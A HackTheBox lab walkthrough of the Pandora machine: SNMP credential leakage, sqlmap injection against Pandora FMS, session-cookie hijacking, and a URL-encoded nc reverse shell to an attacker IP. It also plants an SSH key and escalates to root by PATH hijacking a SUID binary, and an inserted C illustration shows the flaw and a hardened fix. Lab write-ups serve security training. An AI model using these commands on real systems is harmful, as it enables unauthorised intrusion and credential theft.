Pandora HackTheBox WalkThrough


This is the Pandora HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Pandora HackTheBox machine. Before starting, let us know something about this machine: it is a Linux box with IP address 10.10.11.136, rated easy by its maker.

First of all, connect your PC to the HackTheBox VPN and verify connectivity with the Pandora machine by pinging its IP 10.10.11.136. If all goes well, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports, and sometimes it also helps in vulnerability assessment. I used nmap for this task and the results are given below:

Scanning

$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000 10.10.11.136
[Screenshot: full TCP port scan on Pandora HTB]
$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV 10.10.11.136
[Screenshot: script scan on TCP ports 22 and 80]
$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap 10.10.11.136
[Screenshot: port scan on the top 10 UDP ports]
$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap 10.10.11.136
[Screenshot: script scan on UDP port 161]

The nmap full TCP scan revealed ports 22 and 80 as open: OpenSSH is running on port 22 and an Apache2 web server on port 80. The UDP scan of the top 10 ports revealed port 161 as open, with the SNMP service running on it. SNMP is a bit unusual, so let us explore it.

Wikipedia describes Simple Network Management Protocol (SNMP) as an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems, organized in a Management Information Base (MIB) which describes the system status and configuration.

Enumeration on Port 161

Further enumeration of port 161 using nmap's SNMP scripts revealed the credential daniel : HotelBabylon23.

$ sudo nmap -sU -p161 --script "snmp* and not snmp-brute" 10.10.11.136
[Screenshots: SNMP enumeration using nmap scripts, parts 1-3]

You can also use Metasploit's auxiliary module auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It performs the same task as nmap's SNMP scripts.

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[Screenshots: SNMP enumeration using the Metasploit auxiliary module, parts 1-2]

Let us use this credential [daniel : HotelBabylon23] to SSH into the Pandora box.

Getting User Shell

$ ssh daniel@10.10.11.136
HotelBabylon23        # typed at the password prompt
$ whoami && id
[Screenshot: SSH into the daniel account]

We have successfully logged in to the Pandora box as user daniel. It has two users, daniel and matt. The user flag is accessible only to matt and root, so when I tried to access it I got an Access Denied message. To capture the flag we have to log in as user matt. After some enumeration I didn't find anything interesting, so I simply checked all the listening ports on the Pandora box.

Checking the Listening Ports

$ ss -lnpt
[Screenshot: listening ports on Pandora HTB]

Ports 22, 53, 80 and 3306 are listening. Ports 80 and 22 listen normally [they can be reached from outside the box], while ports 3306 and 53 are bound to localhost only. Since we don't have any credentials for them, we can't access them directly. I simply curled 127.0.0.1 and found the URI /pandora_console/, which hinted me to check http://127.0.0.1/pandora_console/. When I checked it, I found different content from what is served at http://10.10.11.136/pandora_console/.

$ curl 127.0.0.1
[Screenshot: curl command result]

To access this Pandora Console, we have to forward port 80 of the box to our local [Kali] machine. Since we have SSH credentials, we can use them for local port forwarding.

Local Port Forwarding

$ ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
HotelBabylon23        # typed at the password prompt
[Screenshot: local port forwarding]

After local port forwarding, pandora_console is accessible through the URL http://127.0.0.1/pandora_console/.

[Screenshot: Pandora Console web interface]

I tried to log in with the Pandora FMS default credential admin : pandora and with some other combinations, but none of them worked. The version of this FMS is also shown, viz. v7.0NG.742_FIX_PERL2020.

[Screenshot: Pandora FMS version details]

I simply googled this version for vulnerabilities and found that it is affected by many of them, namely SQL injection, malicious file execution, privilege escalation, XSS and a lot more. Check this and this article for more info. The SQL injection can be confirmed at the endpoint http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1.

[Screenshot: SQL injection PoC reproduced]

As soon as I confirmed this vulnerability, I dumped the usernames and passwords of all the users.

$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" -D pandora -T tusuario -C fullname,is_admin,password,email --dump --threads=10
[Screenshot: dumping the tusuario table]

Then I tried to crack the hashes using hashcat and the rockyou.txt wordlist, but it could not crack them. So instead I dumped the session IDs of all logged-in users from the table tsessions_php and hijacked the session of user matt.

$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" -D pandora --dbms=mysql -T tsessions_php --dump --threads=10 --risk=3
[Screenshot: dumping the tsessions_php table]

Hijacking Session of Matt

Simply replace the PHPSESSID cookie value with g80h3hf7j4u3js38pchlm445kn and then refresh the page. We can see that we have successfully hijacked matt's session and are logged in as matt.

[Screenshot: session hijacking on Pandora HTB]

Getting Shell as Matt

According to this post, we can perform remote command execution via the Events feature.

Note: if we get a user shell here, it will have the privileges of the user matt, because we are currently logged in as matt.

Let us exploit and get user shell using the PoC given in this post.

On Kali Machine

$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "http://127.0.0.1/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.10.17.97+1234+%3E/tmp/f&response_id=1"

On Local Machine

$ nc -nvlp 1234
$ whoami && id
[Screenshot: user shell as matt on Pandora HTB]

We have successfully got a user shell with the privileges of user matt. Let us upgrade it to a fully interactive TTY shell so that we can run more advanced Linux commands through it.

Note: you will get an access denied message as below if matt's session ID has expired. In that case, dump a fresh session ID from the tsessions_php table and use it to hijack matt's session again.

[Screenshot: unauthorized access error]

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # Plus press 2 times enter to foreground the shell
$ export TERM=xterm
[Screenshot: upgrading the user shell]

We have successfully upgraded the shell. Let us capture user flag.

Capture User Flag

$ cat /home/matt/user.txt
[Screenshot: capturing the user flag]

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector. We can find one either manually or using post-exploitation enumeration scripts like Linpeas.sh, LinEnum.sh and many more; check this link on PayloadsAllTheThings. This time I used Linpeas.sh for the task.

Finding PrivEsc Vector

Linpeas.sh found a custom SUID binary pandora_backup in the directory /usr/bin/. A SUID binary is a file that, when executed by a normal user, runs with the permissions of its owner rather than those of the user who executed it. For example, if a binary has the SUID bit set and is owned by root, then when a normal user executes it, all the commands inside that binary run with root privileges.

[Screenshot: Linpeas result showing the SUID binary]

Let us check who can execute pandora_backup by checking its permissions.

$ ls -la /usr/bin/pandora_backup
[Screenshot: permissions of the pandora_backup SUID binary]

pandora_backup has execute permission for user matt. Such a binary can be used to escalate privileges by PATH hijacking if the Linux commands it calls are not referenced by their absolute paths. Let us check whether any command is used without its absolute path inside pandora_backup.

$ cat /usr/bin/pandora_backup
[Screenshot: contents of the pandora_backup file]

We found that the tar command is called without its absolute path. We can use tar to exploit this weakness and get a root shell. When I tried to get a shell by manipulating which tar is run, I got a root shell without much effort. So our potential PrivEsc vector is privilege escalation by PATH hijacking, or equivalently by custom SUID exploitation. Check HTB boxes with similar privilege escalation vectors here and here.
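As an added illustration (this is not the source of pandora_backup, which the writeup only describes), here is the vulnerable pattern in C next to a hardened version that a developer should ship instead, plus a small audit helper for command strings recovered from a binary. The tar path /usr/bin/tar and the sample command lines are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (constructed, not the page's pandora_backup source): a
 * set-uid program shells out with a bare command name. system() runs /bin/sh -c,
 * and the shell resolves "tar" through the caller's PATH, so whatever "tar"
 * comes first in that PATH runs with the binary owner's privileges. */
int backup_vulnerable(const char *src, const char *dst)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "tar -cf %s %s", dst, src);
    return system(cmd);
}

/* Hardened pattern: no shell, absolute program path and a fixed minimal
 * environment, so PATH, LD_PRELOAD, TAR_OPTIONS etc. never reach the child. */
int backup_hardened(const char *src, const char *dst)
{
    char *const argv[] = {"/usr/bin/tar", "-cf", (char *)dst, "--", (char *)src, NULL};
    char *const envp[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(argv[0], argv, envp); _exit(127); } /* returns only on failure */
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Audit helper for strings pulled out of a SUID binary: 1 if the program name
 * has no '/', so it is resolved via PATH; 0 if it is an explicit path; -1 if
 * the command is empty. */
int command_is_path_dependent(const char *cmd)
{
    cmd += strspn(cmd, " \t");
    if (*cmd == '\0') return -1;
    size_t len = strcspn(cmd, " \t");
    return memchr(cmd, '/', len) == NULL ? 1 : 0;
}

int main(void)
{
    /* constructed sample command lines, not taken from the page */
    const char *risky = "tar -cf /root/backup.tar /var/www/html";
    const char *safe  = "/usr/bin/tar -cf /root/backup.tar /var/www/html";
    printf("%d %d\n", command_is_path_dependent(risky), command_is_path_dependent(safe));
    return 0;
}
```

Running this prints `1 0`: the bare `tar` invocation is PATH-dependent, the absolute one is not.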

Before privilege escalation we first need a persistent shell over SSH; only then will our exploit work. I don't know why, but every time I tried to get root from the current reverse shell it failed. The exploit worked only once I had an SSH shell as user matt, obtained by implanting my SSH public key in matt's authorized_keys file. So let us implant our SSH public key into the authorized_keys file.

Implanting SSH Keys

On Kali Machine

$ ssh-keygen -f id_rsa   # generate a new key pair in the current directory
$ cat id_rsa.pub
[Screenshot: generating an SSH key pair]

Copy the contents of id_rsa.pub to your clipboard and paste it into the authorized_keys file of user matt. If authorized_keys is not present, create it as below.

On Pandora Machine

$ mkdir -p ~/.ssh && chmod 700 ~/.ssh
$ cd ~/.ssh/
$ echo "Your SSH public key here" >> authorized_keys   # append, so any existing keys survive
$ chmod 600 authorized_keys
$ cat authorized_keys
[Screenshot: pasting my SSH public key into matt's authorized_keys file]

Getting Shell as Matt

$ chmod 400 id_rsa
$ ssh -i id_rsa matt@10.10.11.136
$ whoami && id
[Screenshot: SSH shell as user matt]

We have successfully got a persistent shell as user matt. Let us get a root shell by performing privilege escalation.

Getting Root Shell

To get root shell do the following.

$ cd /tmp
$ echo "/bin/bash" > tar            # a fake "tar" that just starts a shell
$ export PATH=$(pwd):$PATH          # /tmp is now searched before the real tar
$ chmod +x tar
$ /usr/bin/pandora_backup           # the SUID binary's bare "tar" resolves to ours and runs as root
# whoami && id
[Screenshot: privilege escalation to root]

We have successfully got a root shell. Let us capture the root flag.

Capture Root Flag

# cat /root/root.txt
[Screenshot: capturing the root flag]

This is how I rooted the Pandora HackTheBox machine. I learnt a lot during this walkthrough and hope you have also learnt something new. Thanks for reading this writeup. Share your experience in the comment section. If you want to give any suggestion about the writeup, feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/